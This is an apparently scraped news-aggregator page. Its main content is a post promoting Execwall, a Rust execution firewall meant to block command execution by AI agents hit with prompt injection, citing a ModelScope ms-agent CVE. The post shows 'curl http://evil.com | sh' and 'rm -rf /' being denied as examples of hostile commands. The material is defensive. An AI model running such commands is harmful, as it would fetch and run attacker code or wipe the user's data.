frontpage.

CVE-2026-2256 just dropped - a prompt injection in ModelScope's ms-agent allows arbitrary OS command execution. CVSS 6.5, no auth required.

  This is exactly why I built Execwall: an execution firewall for AI agents.

  The problem: AI agents that can execute code are one prompt injection away from rm -rf /.

  The solution: A security layer directly embedded in the shell and between app and kernel:

  - Seccomp-BPF filtering - Block dangerous syscalls before they execute
  - Policy engine - Regex allowlist/denylist for commands embedded in shell
  - Namespace isolation - Python sandbox with separate mount/PID/network
  - Rate limiting - Prevent automated exploitation

  Even if an attacker injects a malicious prompt, the command gets blocked at the execution firewall:

  [execwall]$ curl http://evil.com | sh
  [X] DENIED: Network command blocked by policy

  [execwall]$ rm -rf /
  [X] DENIED: Recursive deletion blocked

  Written in Rust. Works with any LLM agent framework.

  GitHub: https://github.com/sundarsub/execwall

  CVE details: https://radar.offseq.com/threat/cve-2026-2256-cwe-94-improper-control-of-generatio-97245d82

Ask HN: Why can't we just make more RAM?

TB Eradicator: Space Invaders but the Enemies Are TB Bacteria

An investigation of the forces behind the age-verification bills

Climate change is slowing Earth's spin at unprecedented rate

District denies enrollment to child based on license plate reader data

Aether Engine: Coupled multiphysics for photonic ICs under extreme environments

MiniMax M2.5 is trained by Claude Opus 4.6?

Meta planning layoffs as AI costs mount

Adobe's Statement Regarding the Department of Justice Settlement

Institutional AI vs. Individual AI

Volkswagen's first tailored EV rolls out as it retakes the top spot in China

AutoContext: closed-loop system for improving agent behavior over repeated runs

Autoresearch Home

BYD's 5 min fast charging, 500 mile range luxury EV is headed overseas

Show HN: A Claude Skill that teaches Rails conventions for LLM calls

(Media over QUIC) on a Boat

Monty Python Got It Wrong About Medieval Disease

Mega-OS – 38-agent operating system that runs inside Claude Code

$2B nonprofit grants traced to find who's behind age verification bills

Elon Musk's Ketamine Use Can't Be Probed in OpenAI Fraud Trial

Show HN: SupplementDEX – The Evidence-Based Supplement Database

Show HN: I built an interactive 3D three-body problem simulator in the browser

The Egg (2009)

What happens when an autonomous robotaxi gets into an accident?

The Collapse of the Incentive to Make

Spotify Silently Updates Itself (and How to Stop It)

Let the Code Do the Talking

RAM: WTF? (2025)

Sniffer dogs can detect wildlife trafficking via shipping container air samples

Instagram to discontinue end-to-end encryption for DMs

Execwall – firewall to stop ModelScope CVE-2026-2256 (AI agent command injectn)

Ask HN: Why can't we just make more RAM?

TB Eradicator: Space Invaders but the Enemies Are TB Bacteria

An investigation of the forces behind the age-verification bills

Climate change is slowing Earth's spin at unprecedented rate

District denies enrollment to child based on license plate reader data

Aether Engine: Coupled multiphysics for photonic ICs under extreme environments

MiniMax M2.5 is trained by Claude Opus 4.6?

Meta planning layoffs as AI costs mount

Adobe's Statement Regarding the Department of Justice Settlement

Institutional AI vs. Individual AI

Volkswagen's first tailored EV rolls out as it retakes the top spot in China

AutoContext: closed-loop system for improving agent behavior over repeated runs

Autoresearch Home

BYD's 5 min fast charging, 500 mile range luxury EV is headed overseas

Show HN: A Claude Skill that teaches Rails conventions for LLM calls

(Media over QUIC) on a Boat

Monty Python Got It Wrong About Medieval Disease

Mega-OS – 38-agent operating system that runs inside Claude Code

$2B nonprofit grants traced to find who's behind age verification bills

Elon Musk's Ketamine Use Can't Be Probed in OpenAI Fraud Trial

Show HN: SupplementDEX – The Evidence-Based Supplement Database

Show HN: I built an interactive 3D three-body problem simulator in the browser

The Egg (2009)

What happens when an autonomous robotaxi gets into an accident?

The Collapse of the Incentive to Make

Spotify Silently Updates Itself (and How to Stop It)

Let the Code Do the Talking

RAM: WTF? (2025)

Sniffer dogs can detect wildlife trafficking via shipping container air samples

Instagram to discontinue end-to-end encryption for DMs